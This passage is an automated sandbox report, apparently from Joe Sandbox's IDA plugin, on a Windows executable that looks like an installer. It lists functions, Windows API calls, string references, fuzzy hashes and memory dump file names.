Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D

Uniqueness

Uniqueness Score: -1.00%

Function 00403ADC Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403A28,?), ref: 00403AE7

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f6c28f5574ac8d83da97f56e868f3fb7eedea34588f0df7261564807e3161c24
Instruction ID: d4db8dbaf33ff22f2ff991163c220eb3cd6c997f56162562831ac65c0e81f35c
Opcode Fuzzy Hash: f6c28f5574ac8d83da97f56e868f3fb7eedea34588f0df7261564807e3161c24
Instruction Fuzzy Hash: 15C01230504B0056D574AFB99E4FA053A649B4573DB600729B0F8B40F1CF7C5699995D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404954 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049A3
SetWindowTextW.USER32(00000000,?), ref: 004049CD
SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
CoTaskMemFree.OLE32(00000000), ref: 00404A89
lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404ABB
lstrcatW.KERNEL32(?,: Completed), ref: 00404AC7
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9

Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E

Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
Part of subcall function 0040678E: CharNextW.USER32(?,00000000,75573420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
Part of subcall function 0040678E: CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818

GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7

Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD

Strings

A, xrefs: 00404A77
: Completed, xrefs: 00404AB5, 00404ABA, 00404AC5

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A
API String ID: 2624150263-4013017881
Opcode ID: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
Opcode Fuzzy Hash: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405C13 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
lstrcatW.KERNEL32(00425710,\*.*), ref: 00405C84
lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
FindClose.KERNEL32(00000000), ref: 00405D6C

Strings

\*.*, xrefs: 00405C7E
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C20
., xrefs: 00405CCE
., xrefs: 00405CE2

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1333152261
Opcode ID: 4b731669e665cacf6ce1f794043a7a558127a79abdb50f6fa8d1a93f69750987
Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
Opcode Fuzzy Hash: 4b731669e665cacf6ce1f794043a7a558127a79abdb50f6fa8d1a93f69750987
Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00402269

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
API String ID: 542301482-3483070565
Opcode ID: b7224711a1886d81de964c301140e5375d6dc29c5df58188df5f48abd80a26da
Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
Opcode Fuzzy Hash: b7224711a1886d81de964c301140e5375d6dc29c5df58188df5f48abd80a26da
Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 2c1de46c9de125277af46efb28eff1ccda4c71d9005682545634e4999e14e04f
Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
Opcode Fuzzy Hash: 2c1de46c9de125277af46efb28eff1ccda4c71d9005682545634e4999e14e04f
Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404EE8
GetDlgItem.USER32(?,00000408), ref: 00404EF3
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
DeleteObject.GDI32(00000000), ref: 00404FCA
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
GetWindowLongW.USER32(?,000000F0), ref: 0040510E
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
ShowWindow.USER32(?,00000005), ref: 0040512C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
ImageList_Destroy.COMCTL32(?), ref: 004052FA
GlobalFree.KERNEL32(?), ref: 0040530A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
ShowWindow.USER32(?,00000000), ref: 004054B4
GetDlgItem.USER32(?,000003FE), ref: 004054BF
ShowWindow.USER32(00000000), ref: 004054C6

Strings

, xrefs: 0040549E
M, xrefs: 00405084
N, xrefs: 00405165

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
Opcode Fuzzy Hash: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404622 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
GetDlgItem.USER32(?,000003E8), ref: 004046D4
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
GetSysColor.USER32(?), ref: 00404702
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
lstrlenW.KERNEL32(?), ref: 00404723
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
GetDlgItem.USER32(?,0000040A), ref: 0040479E
SendMessageW.USER32(00000000), ref: 004047A5
GetDlgItem.USER32(?,000003E8), ref: 004047D0
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
LoadCursorW.USER32(00000000,00007F02), ref: 00404821
SetCursor.USER32(00000000), ref: 00404824
LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
SetCursor.USER32(00000000), ref: 00404840
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881

Strings

N, xrefs: 004047BE
: Completed, xrefs: 004047FF

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040614D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191

Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
wsprintfA.USER32 ref: 004061CC
GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
GlobalFree.KERNEL32(00000000), ref: 004062B5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC

Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,00438800,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Strings

[Rename], xrefs: 00406236, 00406248
%ls=%ls, xrefs: 004061C2

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
Opcode Fuzzy Hash: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD

Uniqueness

Uniqueness Score: -1.00%

Function 004044CA Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004044E7
GetSysColor.USER32(00000000), ref: 00404525
SetTextColor.GDI32(?,00000000), ref: 00404531
SetBkMode.GDI32(?,?), ref: 0040453D
GetSysColor.USER32(?), ref: 00404550
SetBkColor.GDI32(?,?), ref: 00404560
DeleteObject.GDI32(?), ref: 0040457A
CreateBrushIndirect.GDI32(?), ref: 00404584

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
